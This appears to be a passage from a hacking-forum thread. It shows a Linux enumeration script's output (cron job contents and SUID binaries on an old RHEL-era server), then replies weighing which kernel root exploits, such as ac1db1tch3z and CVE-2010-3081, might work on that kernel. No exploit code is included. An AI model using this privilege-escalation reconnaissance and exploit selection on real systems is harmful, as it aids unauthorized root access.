lrwxrwxrwx  1 root root   26 2011-03-21 17:17:31.000000000 +0300 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
lrwxrwxrwx  1 root root   26 2012-03-15 04:22:56.000000000 +0400 libdevmapper-event.so -> libdevmapper-event.so.1.02
lrwxrwxrwx  1 root root   28 2013-01-29 13:35:19.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx  1 root root   31 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02
lrwxrwxrwx  1 root root   34 2011-09-18 00:35:43.000000000 +0400 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13
lrwxrwxrwx  1 root root   46 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
lrwxrwxrwx  1 root root   48 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
total 15M
**************************************************
*             crontab info                       *
*                                                *
**************************************************
[+]List of CRON tabs:
4408691    4 -rwxr-xr-x   1 root     root          354 Aug 11  2010 /etc/cron.daily/tmpwatch
4408319    4 -rwxr-xr-x   1 root     root          180 Jun  4  2012 /etc/cron.daily/logrotate
4407379    4 -rwxr-xr-x   1 root     root          418 May 30  2012 /etc/cron.daily/makewhatis.cron
4408041    4 -rwxr-xr-x   1 root     root          137 Sep  3  2009 /etc/cron.daily/mlocate.cron
32325734    4 -rwxr-xr-x   1 root     root          296 Feb 25 14:06 /etc/cron.daily/rpm
4408045    4 -rwxr-xr-x   1 root     root          282 Jun  2  2008 /etc/cron.daily/yum.check-update
32325735    4 -rwxr-xr-x   1 root     root          150 Mar 20 16:12 /etc/cron.daily/freshclam
4408042    4 -rwxr-xr-x   1 root     root         2181 Jun 21  2006 /etc/cron.daily/prelink
4407924    0 -rw-r--r--   1 root     root            0 May 16  2008 /etc/cron.deny
4408018    4 -rwxr-xr-x   1 root     root          414 May 30  2012 /etc/cron.weekly/makewhatis.cron
32391237    4 -rwxr-xr-x   1 root     root         2843 Jan  9  2013 /etc/cron.weekly/99-raid-check
4407925    4 -rw-r--r--   1 root     root          500 Jan 11  2011 /etc/crontab

[+]List of USER CRON tabs:
=====================================
== READ cronfile: /etc/cron.daily/tmpwatch
flags=-umc
/usr/sbin/tmpwatch "$flags" -x /tmp/.X11-unix -x /tmp/.XIM-unix \
	-x /tmp/.font-unix -x /tmp/.ICE-unix -x /tmp/.Test-unix \
	-X '/tmp/hsperfdata_*' 240 /tmp
/usr/sbin/tmpwatch "$flags" 720 /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
    if [ -d "$d" ]; then
	/usr/sbin/tmpwatch "$flags" -f 720 "$d"
    fi
done
== end of /etc/cron.daily/tmpwatch 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/logrotate
#!/bin/sh

/usr/sbin/logrotate /etc/logrotate.conf
EXITVALUE=$?
if [ $EXITVALUE != 0 ]; then
    /usr/bin/logger -t logrotate "ALERT exited abnormally with [$EXITVALUE]"
fi
exit 0
== end of /etc/cron.daily/logrotate 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/makewhatis.cron
#!/bin/bash

LOCKFILE=/var/lock/makewhatis.lock

# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes.  The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "{ rm -f $LOCKFILE ; exit 255; }" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0
== end of /etc/cron.daily/makewhatis.cron 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/mlocate.cron
#!/bin/sh
nodevs=$(< /proc/filesystems awk '$1 == "nodev" { print $2 }')
renice +19 -p $$ >/dev/null 2>&1
/usr/bin/updatedb -f "$nodevs"
== end of /etc/cron.daily/mlocate.cron 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/rpm
#!/bin/sh

tmpfile=`/bin/mktemp /var/log/rpmpkgs.XXXXXXXXX` || exit 1
/bin/rpm -qa --qf '%{name}-%{version}-%{release}.%{arch}.rpm\n' 2>&1 \
	| /bin/sort > "$tmpfile"

if [ ! -s "$tmpfile" ]; then
	rm -f "$tmpfile"
	exit 1
fi

/bin/mv "$tmpfile" /var/log/rpmpkgs
/bin/chmod 0644 /var/log/rpmpkgs
== end of /etc/cron.daily/rpm 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/yum.check-update
#!/bin/bash

Mail="root"

List=`mktemp /tmp/yum.check-update.XXXXXXXXXX`

# Clean up when done or when aborting.
trap "rm -f $List" 0 1 2 3 15

yum -R 10 -e 0 -d 0 check-update >$List 2>&1

if [ $? -ne 0 ]; then
        mail -s "yum updates available: `hostname`" $Mail < $List
fi

== end of /etc/cron.daily/yum.check-update 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/freshclam
#!/bin/sh

### A simple update script for the clamav virus database.
### This could as well be replaced by a SysV script.

/usr/bin/freshclam --quiet
== end of /etc/cron.daily/freshclam 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/prelink
#!/bin/sh

. /etc/sysconfig/prelink

renice +19 -p $$ >/dev/null 2>&1

if [ "$PRELINKING" != yes ]; then
  if [ -f /etc/prelink.cache ]; then
    echo /usr/sbin/prelink -uav > /var/log/prelink/prelink.log
    /usr/sbin/prelink -uav >> /var/log/prelink/prelink.log 2>&1 \
      || echo Prelink failed with return value $? >> /var/log/prelink/prelink.log
    rm -f /etc/prelink.cache
    # Restart init if needed
    [ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u
  fi
  exit 0
fi

if [ ! -f /etc/prelink.cache -o -f /var/lib/misc/prelink.force ] \
   || grep -q '^prelink-ELF0.[0-2]' /etc/prelink.cache; then
  # If cache does not exist or is from older prelink versions or
  # if we were asked to explicitely, force full prelinking
  rm -f /etc/prelink.cache /var/lib/misc/prelink.force
  PRELINK_OPTS="$PRELINK_OPTS -f"
  date > /var/lib/misc/prelink.full
  cp -a /var/lib/misc/prelink.{full,quick}
elif [ -n "$PRELINK_FULL_TIME_INTERVAL" \
       -a "`find /var/lib/misc/prelink.full -mtime -${PRELINK_FULL_TIME_INTERVAL} 2>/dev/null`" \
	  = /var/lib/misc/prelink.full ]; then
  # If no more than PRELINK_NONRPM_CHECK_INTERVAL days elapsed from last prelink
  # (be it full or quick) and no packages have been upgraded via rpm since then,
  # don't do anything.
  [ "`find /var/lib/misc/prelink.quick -mtime -${PRELINK_NONRPM_CHECK_INTERVAL:-7} 2>/dev/null`" \
    -a -f /var/lib/rpm/Packages \
    -a /var/lib/rpm/Packages -ot /var/lib/misc/prelink.quick ] && exit 0
  date > /var/lib/misc/prelink.quick
  # If prelink without -q has been run in the last
  # PRELINK_FULL_TIME_INTERVAL days, just use quick mode
  PRELINK_OPTS="$PRELINK_OPTS -q"
else
  date > /var/lib/misc/prelink.full
  cp -a /var/lib/misc/prelink.{full,quick}
fi

echo /usr/sbin/prelink -av $PRELINK_OPTS > /var/log/prelink/prelink.log
/usr/sbin/prelink -av $PRELINK_OPTS >> /var/log/prelink/prelink.log 2>&1 \
  || echo Prelink failed with return value $? >> /var/log/prelink/prelink.log
# Restart init if needed
[ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u

exit 0
== end of /etc/cron.daily/prelink 
=====================================
=====================================
== /etc/cron.deny EMPTY
=====================================
=====================================
== READ cronfile: /etc/cron.weekly/makewhatis.cron
#!/bin/bash

LOCKFILE=/var/lock/makewhatis.lock

# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes.  The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "{ rm -f $LOCKFILE; exit 255; }" EXIT
touch $LOCKFILE
makewhatis -w
exit 0
== end of /etc/cron.weekly/makewhatis.cron 
=====================================
=====================================
== READ cronfile: /etc/cron.weekly/99-raid-check
#!/bin/bash
#
# This script reads it's configuration from /etc/sysconfig/raid-check
# Please use that file to enable/disable this script or to set the
# type of check you wish performed.

# We might be on a kernel with no raid support at all, exit if so
[ -f /proc/mdstat ] || exit 0

# and exit if we haven't been set up properly
[ -f /etc/sysconfig/raid-check ] || exit 0
. /etc/sysconfig/raid-check

[ "$ENABLED" != "yes" ] && exit 0

case "$CHECK" in
    check) ;;
    repair) ;;
    *) exit 0;;
esac

active_list=`grep "^md.*: active" /proc/mdstat | cut -f 1 -d ' '`
[ -z "$active_list" ] && exit 0

dev_list=""
check_list=""
devnum=0
for dev in $active_list; do
    echo $SKIP_DEVS | grep -w $dev >/dev/null 2>&1 && continue
    if [ -f /sys/block/$dev/md/sync_action ]; then
	# Only perform the checks on idle, healthy arrays, but delay
	# actually writing the check field until the next loop so we
	# don't switch currently idle arrays to active, which happens
	# when two or more arrays are on the same physical disk
	array_state=`cat /sys/block/$dev/md/array_state`
	sync_action=`cat /sys/block/$dev/md/sync_action`
	if [ "$array_state" = clean -o "$array_state" = active ] && [ "$sync_action" = idle ]; then
	    ck=""
	    echo $REPAIR_DEVS | grep -w $dev >/dev/null 2>&1 && ck="repair"
	    echo $CHECK_DEVS | grep -w $dev >/dev/null 2>&1 && ck="check"
	    [ -z "$ck" ] && ck=$CHECK
	    dev_list="$dev_list $dev"
	    check[$devnum]=$ck
	    let devnum++
	    [ "$ck" = "check" ] && check_list="$check_list $dev"
	fi
    fi
done
[ -z "$dev_list" ] && exit 0

devnum=0
for dev in $dev_list; do
    echo "${check[$devnum]}" > /sys/block/$dev/md/sync_action
    let devnum++
done
[ -z "$check_list" ] && exit 0

checking=1
while [ $checking -ne 0 ]
do
	sleep 60
	checking=0
	for dev in $check_list; do
	sync_action=`cat /sys/block/$dev/md/sync_action`
		if [ "$sync_action" != "idle" ]; then
			checking=1
		fi
	done
done
for dev in $check_list; do
	mismatch_cnt=`cat /sys/block/$dev/md/mismatch_cnt`
	# Due to the fact that raid1 writes in the kernel are unbuffered,
	# a raid1 array can have non-0 mismatch counts even when the
	# array is healthy.  These non-0 counts will only exist in
	# transient data areas where they don't pose a problem.  However,
	# since we can't tell the difference between a non-0 count that
	# is just in transient data or a non-0 count that signifies a
	# real problem, simply don't check the mismatch_cnt on raid1
	# devices as it's providing far too many false positives.  But by
	# leaving the raid1 device in the check list and performing the
	# check, we still catch and correct any bad sectors there might
	# be in the device.
	raid_lvl=`cat /sys/block/$dev/md/level`
	if [ "$mismatch_cnt" -ne 0 -a "$raid_lvl" != "raid1" ]; then
		echo "WARNING: mismatch_cnt is not 0 on /dev/$dev"
	fi
done

== end of /etc/cron.weekly/99-raid-check 
=====================================
=====================================
== READ cronfile: /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly


##-- Spamooborona cron entries start
#10 5 * * *	root	/etc/spamooborona/scripts/cron_spamstat
#*/20 * * * *	root	/etc/spamooborona/scripts/cron_rul
#20 10 * * *	root	/etc/spamooborona/scripts/cron_notify



##-- Spamooborona cron entries end

== end of /etc/crontab 
=====================================
**************************************************
*             FIND suid files                    *
*                                                *
**************************************************
-rws--x--x 1 vcsa root 7.7K Nov 11  2007 /usr/libexec/mc/cons.saver
-rwsr-xr-x 1 root root 174K Feb 22  2012 /usr/libexec/openssh/ssh-keysign
-rws--x--x 1 root root 18K Nov  8  2012 /usr/bin/chfn
---s--x--x 2 root root 174K Mar  8 20:06 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 25K Jan  9  2013 /usr/bin/newgrp
-rwsr-xr-x 1 root root 23K Aug 11  2010 /usr/bin/passwd
---s--x--x 2 root root 174K Mar  8 20:06 /usr/bin/sudo
-rws--x--x 1 root root 19K Nov  8  2012 /usr/bin/chsh
-rwsr-xr-x 1 root root 43K Jan 27  2010 /usr/bin/at
-rwsr-xr-x 1 root root 50K Jan  9  2013 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47K Jan  9  2013 /usr/bin/chage
-rwsr-sr-x 1 root root 303K Feb 23  2012 /usr/bin/crontab
-rwsr-sr-x 1 root zabbix 29K Jul 30  2007 /usr/sbin/fping
-r-s--x--- 1 root apache 12K Jun 26 18:38 /usr/sbin/suexec
-rwsr-xr-x 1 root root 30K Jul 30  2007 /usr/sbin/fping6
-rws--x--x 1 root root 33K Feb 27  2009 /usr/sbin/userhelper
-rwsr-xr-x 1 root root 6.8K Aug  9  2012 /usr/sbin/usernetctl
-rwsr-x--- 1 root dbus 45K Aug 11  2011 /lib/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 59K Nov  8  2012 /bin/mount
-rwsr-xr-x 1 root root 35K Sep 26  2009 /bin/ping
-rwsr-xr-x 1 root root 24K Mar 21  2012 /bin/su
-rwsr-xr-x 1 root root 40K Nov  8  2012 /bin/umount
-rwsr-xr-x 1 root root 31K Sep 26  2009 /bin/ping6
-rwsr-xr-x 1 root root 72K Jan  9  2013 /sbin/mount.nfs4
-rwsr-xr-x 1 root root 19K Jan  9  2013 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 72K Jan  9  2013 /sbin/umount.nfs4
-rwsr-xr-x 1 root root 72K Jan  9  2013 /sbin/umount.nfs
-rwsr-xr-x 1 root root 13K Jan  9  2013 /sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 72K Jan  9  2013 /sbin/mount.nfs
[!] ALL JOBS DONE, Have a good day!
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
Old 04.08.2013, 03:10   #918
b3

Joined: 18.08.2010
Posts: 353
Reputation: 105

It says [censored] on the fence too, but behind it there are only boards. At least post a video, maybe we'll recognize the exploit. I heard about an exploit for -194.el5 a long time ago, but there's still nothing public.
Old 05.08.2013, 17:16   #919
12309

Joined: 25.12.2011
Posts: 265
Reputation: 33

IIRC ac1db1tch3z works up to 2.6.18-194.15.2
194.32 doesn't get popped
Old 05.08.2013, 17:22   #920
Pashkela

Joined: 05.07.2010
Posts: 1,243

ac1db1tch3z only works on 2.6.27+, I think, no?

and besides, it's

CVE-2010-3081 - Published: 2010-09-16

it clearly won't work on something from 2011

dbus could be looked at, but you need a user's password (any user's)